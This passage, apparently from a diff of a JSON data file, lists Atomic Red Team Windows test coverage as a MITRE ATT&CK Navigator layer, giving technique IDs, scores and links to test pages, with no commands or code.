Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.010","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1548.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View 